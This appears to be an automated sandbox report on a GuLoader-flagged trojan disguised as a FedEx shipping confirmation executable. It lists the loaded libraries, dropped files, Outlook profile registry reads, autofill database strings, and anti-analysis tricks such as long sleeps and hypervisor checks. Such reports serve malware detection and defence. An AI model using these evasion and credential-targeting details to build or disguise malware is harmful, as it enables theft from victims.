Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B67068	3_2_35B67068
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B69258	3_2_35B69258
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B60040	3_2_35B60040

Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs FedEx Shipping Confirmation.exe
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp	Binary or memory string: lastOriginalFileName vs FedEx Shipping Confirmation.exe
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.000000007013B000.00000020.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs FedEx Shipping Confirmation.exe

Source: FedEx Shipping Confirmation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/13@4/4

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

1_2_0040352F

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

File created: C:\Users\user\AppData\Local\Temp\nsv2B5D.tmp

Jump to behavior

Source: FedEx Shipping Confirmation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F33000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: FedEx Shipping Confirmation.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

File read: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process created: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process created: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: FedEx Shipping Confirmation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070C5B000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070C5B000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Drawing.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070C5B000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: FedEx Shipping Confirmation.exe, 00000003.00000002.8133506250.0000000070E3B000.00000020.00000001.01000000.0000000D.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.3333461569.0000000004B3F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Code function: 1_2_6ED21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_6ED21BFF

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 1_2_6ED230C0 push eax; ret	1_2_6ED230EE
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C29E pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C28C pushfd ; retn 0019h	3_3_0019C291
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C238 pushfd ; retn 0019h	3_3_0019C261
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019BF74 pushfd ; iretd	3_3_0019BFA9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C2EC pushfd ; retn 0019h	3_3_0019C2ED
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_3_0019C2EC pushfd ; retn 0019h	3_3_0019C2ED

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File created: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File created: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File created: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\LangDLL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File created: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	File created: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsExec.dll	Jump to dropped file

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	API/Special instruction interceptor: Address: 4E5C5D2
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	API/Special instruction interceptor: Address: 1E5C5D2

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Memory allocated: 32F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Memory allocated: 34F10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\LangDLL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq2CC5.tmp\nsExec.dll	Jump to dropped file

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe TID: 1880	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe TID: 1880	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 1_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		1_2_00405C60
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 1_2_004068B1 FindFirstFileW,FindClose,		1_2_004068B1

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8114126777.0000000002944000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8114126777.0000000002903000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@0
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8114126777.000000000291A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	API call chain: ExitProcess graph end node			graph_1-2686
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	API call chain: ExitProcess graph end node			graph_1-2910

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Code function: 1_2_00406044 GetFileAttributesW,LdrInitializeThunk,LdrInitializeThunk,CreateFileW,

1_2_00406044

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Code function: 1_2_6ED21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_6ED21BFF

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Process created: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"

Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Queries volume information: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
